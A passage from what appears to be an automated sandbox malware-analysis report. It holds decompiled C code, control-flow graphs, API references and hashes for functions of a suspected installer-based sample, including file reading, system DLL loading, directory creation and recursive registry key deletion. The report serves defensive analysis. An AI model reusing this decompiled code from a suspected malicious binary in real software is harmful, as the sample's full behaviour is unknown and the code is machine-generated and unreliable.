                                                              control_flow_graph 799 4056ca-4056df 800 4056e5-4056f6 799->800 801 405796-40579a 799->801 802 405701-40570d lstrlenW 800->802 803 4056f8-4056fc call 4066a5 800->803 805 40572a-40572e 802->805 806 40570f-40571f lstrlenW 802->806 803->802 808 405730-405737 SetWindowTextW 805->808 809 40573d-405741 805->809 806->801 807 405721-405725 lstrcatW 806->807 807->805 808->809 810 405743-405785 SendMessageW * 3 809->810 811 405787-405789 809->811 810->811 811->801 812 40578b-40578e 811->812 812->801
                                                              C-Code - Quality: 100%
                                                              			E004056CA(signed int _a4, WCHAR* _a8) {
                                                              				struct HWND__* _v8;
                                                              				signed int _v12;
                                                              				WCHAR* _v32;
                                                              				long _v44;
                                                              				int _v48;
                                                              				void* _v52;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				WCHAR* _t27;
                                                              				signed int _t28;
                                                              				long _t29;
                                                              				signed int _t37;
                                                              				signed int _t38;
                                                              
                                                              				_t27 =  *0x429244;
                                                              				_v8 = _t27;
                                                              				if(_t27 != 0) {
                                                              					_t37 =  *0x42a314;
                                                              					_v12 = _t37;
                                                              					_t38 = _t37 & 0x00000001;
                                                              					if(_t38 == 0) {
                                                              						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                              					}
                                                              					_t27 = lstrlenW(0x422728);
                                                              					_a4 = _t27;
                                                              					if(_a8 == 0) {
                                                              						L6:
                                                              						if((_v12 & 0x00000004) == 0) {
                                                              							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
                                                              						}
                                                              						if((_v12 & 0x00000002) == 0) {
                                                              							_v32 = 0x422728;
                                                              							_v52 = 1;
                                                              							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                              							_v44 = 0;
                                                              							_v48 = _t29 - _t38;
                                                              							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                              							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                              						}
                                                              						if(_t38 != 0) {
                                                              							_t28 = _a4;
                                                              							0x422728[_t28] = 0;
                                                              							return _t28;
                                                              						}
                                                              					} else {
                                                              						_t27 = lstrlenW(_a8) + _a4;
                                                              						if(_t27 < 0x1000) {
                                                              							_t27 = lstrcatW(0x422728, _a8);
                                                              							goto L6;
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t27;
                                                              			}

















                                                              0x004056d0
                                                              0x004056da
                                                              0x004056df
                                                              0x004056e5
                                                              0x004056f0
                                                              0x004056f3
                                                              0x004056f6
                                                              0x004056fc
                                                              0x004056fc
                                                              0x00405702
                                                              0x0040570a
                                                              0x0040570d
                                                              0x0040572a
                                                              0x0040572e
                                                              0x00405737
                                                              0x00405737
                                                              0x00405741
                                                              0x0040574a
                                                              0x00405756
                                                              0x0040575d
                                                              0x00405761
                                                              0x00405764
                                                              0x00405777
                                                              0x00405785
                                                              0x00405785
                                                              0x00405789
                                                              0x0040578b
                                                              0x0040578e
                                                              0x00000000
                                                              0x0040578e
                                                              0x0040570f
                                                              0x00405717
                                                              0x0040571f
                                                              0x00405725
                                                              0x00000000
                                                              0x00405725
                                                              0x0040571f
                                                              0x0040570d
                                                              0x0040579a

                                                              APIs
                                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,004030A8), ref: 00405725
                                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll), ref: 00405737
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000), ref: 004068A4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll
                                                              • API String ID: 1495540970-2110057742
                                                              • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                              • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                              • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                              • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 813 4026ec-402705 call 402d84 816 402c2a-402c2d 813->816 817 40270b-402712 813->817 818 402c33-402c39 816->818 819 402714 817->819 820 402717-40271a 817->820 819->820 822 402720-40272f call 4065c8 820->822 823 40287e-402886 820->823 822->823 826 402735 822->826 823->816 827 40273b-40273f 826->827 828 4027d4-4027d7 827->828 829 402745-402760 ReadFile 827->829 831 4027d9-4027dc 828->831 832 4027ef-4027ff call 4061db 828->832 829->823 830 402766-40276b 829->830 830->823 834 402771-40277f 830->834 831->832 835 4027de-4027e9 call 406239 831->835 832->823 840 402801 832->840 837 402785-402797 MultiByteToWideChar 834->837 838 40283a-402846 call 4065af 834->838 835->823 835->832 837->840 841 402799-40279c 837->841 838->818 844 402804-402807 840->844 845 40279e-4027a9 841->845 844->838 847 402809-40280e 844->847 845->844 848 4027ab-4027d0 SetFilePointer MultiByteToWideChar 845->848 849 402810-402815 847->849 850 40284b-40284f 847->850 848->845 851 4027d2 848->851 849->850 852 402817-40282a 849->852 853 402851-402855 850->853 854 40286c-402878 SetFilePointer 850->854 851->840 852->823 855 40282c-402832 852->855 856 402857-40285b 853->856 857 40285d-40286a 853->857 854->823 855->827 858 402838 855->858 856->854 856->857 857->823 858->823
                                                              C-Code - Quality: 87%
                                                              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                              				intOrPtr _t65;
                                                              				intOrPtr _t66;
                                                              				intOrPtr _t72;
                                                              				void* _t76;
                                                              				void* _t79;
                                                              
                                                              				_t72 = __edx;
                                                              				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                              				_t65 = 2;
                                                              				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                              				_t66 = E00402D84(_t65);
                                                              				_t79 = _t66 - 1;
                                                              				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                              				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                              				if(_t79 < 0) {
                                                              					L36:
                                                              					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                              				} else {
                                                              					__ecx = 0x3ff;
                                                              					if(__eax > 0x3ff) {
                                                              						 *(__ebp - 0x44) = 0x3ff;
                                                              					}
                                                              					if( *__edi == __bx) {
                                                              						L34:
                                                              						__ecx =  *(__ebp - 0xc);
                                                              						__eax =  *(__ebp - 8);
                                                              						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                              						if(_t79 == 0) {
                                                              							 *(_t76 - 4) = 1;
                                                              						}
                                                              						goto L36;
                                                              					} else {
                                                              						 *(__ebp - 0x38) = __ebx;
                                                              						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                              						if( *(__ebp - 0x44) > __ebx) {
                                                              							do {
                                                              								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                              									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                              										__eax = __ebp - 0x50;
                                                              										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                              											goto L34;
                                                              										} else {
                                                              											goto L21;
                                                              										}
                                                              									} else {
                                                              										goto L34;
                                                              									}
                                                              								} else {
                                                              									__eax = __ebp - 0x40;
                                                              									_push(__ebx);
                                                              									_push(__ebp - 0x40);
                                                              									__eax = 2;
                                                              									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                              									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                                              									if(__eax == 0) {
                                                              										goto L34;
                                                              									} else {
                                                              										__ecx =  *(__ebp - 0x40);
                                                              										if(__ecx == __ebx) {
                                                              											goto L34;
                                                              										} else {
                                                              											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                              											 *(__ebp - 0x4c) = __ecx;
                                                              											 *(__ebp - 0x50) = __eax;
                                                              											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                              												L28:
                                                              												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                              											} else {
                                                              												__ebp - 0x50 = __ebp + 0xa;
                                                              												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                              													L21:
                                                              													__eax =  *(__ebp - 0x50);
                                                              												} else {
                                                              													__edi =  *(__ebp - 0x4c);
                                                              													__edi =  ~( *(__ebp - 0x4c));
                                                              													while(1) {
                                                              														_t22 = __ebp - 0x40;
                                                              														 *_t22 =  *(__ebp - 0x40) - 1;
                                                              														__eax = 0xfffd;
                                                              														 *(__ebp - 0x50) = 0xfffd;
                                                              														if( *_t22 == 0) {
                                                              															goto L22;
                                                              														}
                                                              														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                              														__edi = __edi + 1;
                                                              														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                                              														__ebp - 0x50 = __ebp + 0xa;
                                                              														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                              															continue;
                                                              														} else {
                                                              															goto L21;
                                                              														}
                                                              														goto L22;
                                                              													}
                                                              												}
                                                              												L22:
                                                              												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                              													goto L28;
                                                              												} else {
                                                              													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                              														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                              															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                              															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                              														} else {
                                                              															__ecx =  *(__ebp - 0xc);
                                                              															__edx =  *(__ebp - 8);
                                                              															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                              															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                              														}
                                                              														goto L34;
                                                              													} else {
                                                              														__ecx =  *(__ebp - 0xc);
                                                              														__edx =  *(__ebp - 8);
                                                              														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                              														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                              														 *(__ebp - 0x38) = __eax;
                                                              														if(__ax == __bx) {
                                                              															goto L34;
                                                              														} else {
                                                              															goto L26;
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								goto L37;
                                                              								L26:
                                                              								__eax =  *(__ebp - 8);
                                                              							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                              						}
                                                              						goto L34;
                                                              					}
                                                              				}
                                                              				L37:
                                                              				return 0;
                                                              			}








                                                              0x004026ec
                                                              0x004026ee
                                                              0x004026f1
                                                              0x004026f3
                                                              0x004026f6
                                                              0x004026fb
                                                              0x004026ff
                                                              0x00402702
                                                              0x00402705
                                                              0x00402c2a
                                                              0x00402c2d
                                                              0x0040270b
                                                              0x0040270b
                                                              0x00402712
                                                              0x00402714
                                                              0x00402714
                                                              0x0040271a
                                                              0x0040287e
                                                              0x0040287e
                                                              0x00402881
                                                              0x00402886
                                                              0x004015b6
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00000000
                                                              0x00402720
                                                              0x00402721
                                                              0x0040272c
                                                              0x0040272f
                                                              0x0040273b
                                                              0x0040273f
                                                              0x004027d7
                                                              0x004027ef
                                                              0x004027ff
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402745
                                                              0x00402745
                                                              0x00402748
                                                              0x00402749
                                                              0x0040274c
                                                              0x00402751
                                                              0x00402758
                                                              0x00402760
                                                              0x00000000
                                                              0x00402766
                                                              0x00402766
                                                              0x0040276b
                                                              0x00000000
                                                              0x00402771
                                                              0x00402771
                                                              0x00402779
                                                              0x0040277c
                                                              0x0040277f
                                                              0x0040283a
                                                              0x00402841
                                                              0x00402785
                                                              0x0040278b
                                                              0x00402797
                                                              0x00402801
                                                              0x00402801
                                                              0x00402799
                                                              0x00402799
                                                              0x0040279c
                                                              0x0040279e
                                                              0x0040279e
                                                              0x0040279e
                                                              0x004027a1
                                                              0x004027a6
                                                              0x004027a9
                                                              0x00000000
                                                              0x00000000
                                                              0x004027ab
                                                              0x004027ae
                                                              0x004027b6
                                                              0x004027c2
                                                              0x004027d0
                                                              0x00000000
                                                              0x004027d2
                                                              0x00000000
                                                              0x004027d2
                                                              0x00000000
                                                              0x004027d0
                                                              0x0040279e
                                                              0x00402804
                                                              0x00402807
                                                              0x00000000
                                                              0x00402809
                                                              0x0040280e
                                                              0x0040284f
                                                              0x00402871
                                                              0x00402878
                                                              0x0040285d
                                                              0x0040285d
                                                              0x00402860
                                                              0x00402863
                                                              0x00402866
                                                              0x00402866
                                                              0x00000000
                                                              0x00402817
                                                              0x00402817
                                                              0x0040281a
                                                              0x0040281d
                                                              0x00402823
                                                              0x00402827
                                                              0x0040282a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040282a
                                                              0x0040280e
                                                              0x00402807
                                                              0x0040277f
                                                              0x0040276b
                                                              0x00402760
                                                              0x00000000
                                                              0x0040282c
                                                              0x0040282c
                                                              0x0040282f
                                                              0x00402838
                                                              0x00000000
                                                              0x0040272f
                                                              0x0040271a
                                                              0x00402c33
                                                              0x00402c39

                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                              • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                              • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                              • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 859 4069c5-4069e5 GetSystemDirectoryW 860 4069e7 859->860 861 4069e9-4069eb 859->861 860->861 862 4069fc-4069fe 861->862 863 4069ed-4069f6 861->863 865 4069ff-406a32 wsprintfW LoadLibraryExW 862->865 863->862 864 4069f8-4069fa 863->864 864->865
                                                              C-Code - Quality: 100%
                                                              			E004069C5(intOrPtr _a4) {
                                                              				short _v576;
                                                              				signed int _t13;
                                                              				struct HINSTANCE__* _t17;
                                                              				signed int _t19;
                                                              				void* _t24;
                                                              
                                                              				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                              				if(_t13 > 0x104) {
                                                              					_t13 = 0;
                                                              				}
                                                              				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                              					_t19 = 1;
                                                              				} else {
                                                              					_t19 = 0;
                                                              				}
                                                              				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                              				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                              				return _t17;
                                                              			}








                                                              0x004069dc
                                                              0x004069e5
                                                              0x004069e7
                                                              0x004069e7
                                                              0x004069eb
                                                              0x004069fe
                                                              0x004069f8
                                                              0x004069f8
                                                              0x004069f8
                                                              0x00406a17
                                                              0x00406a2b
                                                              0x00406a32

                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                              • wsprintfW.USER32 ref: 00406A17
                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME$\
                                                              • API String ID: 2200240437-1946221925
                                                              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                              • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                              • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 866 405b99-405be4 CreateDirectoryW 867 405be6-405be8 866->867 868 405bea-405bf7 GetLastError 866->868 869 405c11-405c13 867->869 868->869 870 405bf9-405c0d SetFileSecurityW 868->870 870->867 871 405c0f GetLastError 870->871 871->869
                                                              C-Code - Quality: 100%
                                                              			E00405B99(WCHAR* _a4) {
                                                              				struct _SECURITY_ATTRIBUTES _v16;
                                                              				struct _SECURITY_DESCRIPTOR _v36;
                                                              				int _t22;
                                                              				long _t23;
                                                              
                                                              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                              				_v36.Owner = 0x4083f8;
                                                              				_v36.Group = 0x4083f8;
                                                              				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                              				_v16.lpSecurityDescriptor =  &_v36;
                                                              				_v36.Revision = 1;
                                                              				_v36.Control = 4;
                                                              				_v36.Dacl = 0x4083e8;
                                                              				_v16.nLength = 0xc;
                                                              				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                              				if(_t22 != 0) {
                                                              					L1:
                                                              					return 0;
                                                              				}
                                                              				_t23 = GetLastError();
                                                              				if(_t23 == 0xb7) {
                                                              					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                              						goto L1;
                                                              					}
                                                              					return GetLastError();
                                                              				}
                                                              				return _t23;
                                                              			}







                                                              0x00405ba4
                                                              0x00405ba8
                                                              0x00405bab
                                                              0x00405bb1
                                                              0x00405bb5
                                                              0x00405bb9
                                                              0x00405bc1
                                                              0x00405bc8
                                                              0x00405bce
                                                              0x00405bd5
                                                              0x00405bdc
                                                              0x00405be4
                                                              0x00405be6
                                                              0x00000000
                                                              0x00405be6
                                                              0x00405bf0
                                                              0x00405bf7
                                                              0x00405c0d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405c0f
                                                              0x00405c13

                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                              • GetLastError.KERNEL32 ref: 00405BF0
                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                              • GetLastError.KERNEL32 ref: 00405C0F
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 3449924974-3355392842
                                                              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                              • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                              • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 872 402ea9-402ed2 call 4064d5 874 402ed7-402edb 872->874 875 402ee1-402ee5 874->875 876 402f8c-402f90 874->876 877 402ee7-402f08 RegEnumValueW 875->877 878 402f0a-402f1d 875->878 877->878 879 402f71-402f7f RegCloseKey 877->879 880 402f46-402f4d RegEnumKeyW 878->880 879->876 881 402f1f-402f21 880->881 882 402f4f-402f61 RegCloseKey call 406a35 880->882 881->879 883 402f23-402f37 call 402ea9 881->883 888 402f81-402f87 882->888 889 402f63-402f6f RegDeleteKeyW 882->889 883->882 890 402f39-402f45 883->890 888->876 889->876 890->880
                                                              C-Code - Quality: 48%
                                                              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                              				void* _v8;
                                                              				int _v12;
                                                              				short _v536;
                                                              				void* _t27;
                                                              				signed int _t33;
                                                              				intOrPtr* _t35;
                                                              				signed int _t45;
                                                              				signed int _t46;
                                                              				signed int _t47;
                                                              
                                                              				_t46 = _a12;
                                                              				_t47 = _t46 & 0x00000300;
                                                              				_t45 = _t46 & 0x00000001;
                                                              				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                              				if(_t27 == 0) {
                                                              					if((_a12 & 0x00000002) == 0) {
                                                              						L3:
                                                              						_push(0x105);
                                                              						_push( &_v536);
                                                              						_push(0);
                                                              						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                              							__eflags = _t45;
                                                              							if(__eflags != 0) {
                                                              								L10:
                                                              								RegCloseKey(_v8);
                                                              								return 0x3eb;
                                                              							}
                                                              							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                              							__eflags = _t33;
                                                              							if(_t33 != 0) {
                                                              								break;
                                                              							}
                                                              							_push(0x105);
                                                              							_push( &_v536);
                                                              							_push(_t45);
                                                              						}
                                                              						RegCloseKey(_v8);
                                                              						_t35 = E00406A35(3);
                                                              						if(_t35 != 0) {
                                                              							return  *_t35(_a4, _a8, _t47, 0);
                                                              						}
                                                              						return RegDeleteKeyW(_a4, _a8);
                                                              					}
                                                              					_v12 = 0;
                                                              					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                              						goto L10;
                                                              					}
                                                              					goto L3;
                                                              				}
                                                              				return _t27;
                                                              			}












                                                              0x00402eb4
                                                              0x00402ebd
                                                              0x00402ec6
                                                              0x00402ed2
                                                              0x00402edb
                                                              0x00402ee5
                                                              0x00402f0a
                                                              0x00402f10
                                                              0x00402f15
                                                              0x00402f16
                                                              0x00402f46
                                                              0x00402f1f
                                                              0x00402f21
                                                              0x00402f71
                                                              0x00402f74
                                                              0x00000000
                                                              0x00402f7a
                                                              0x00402f30
                                                              0x00402f35
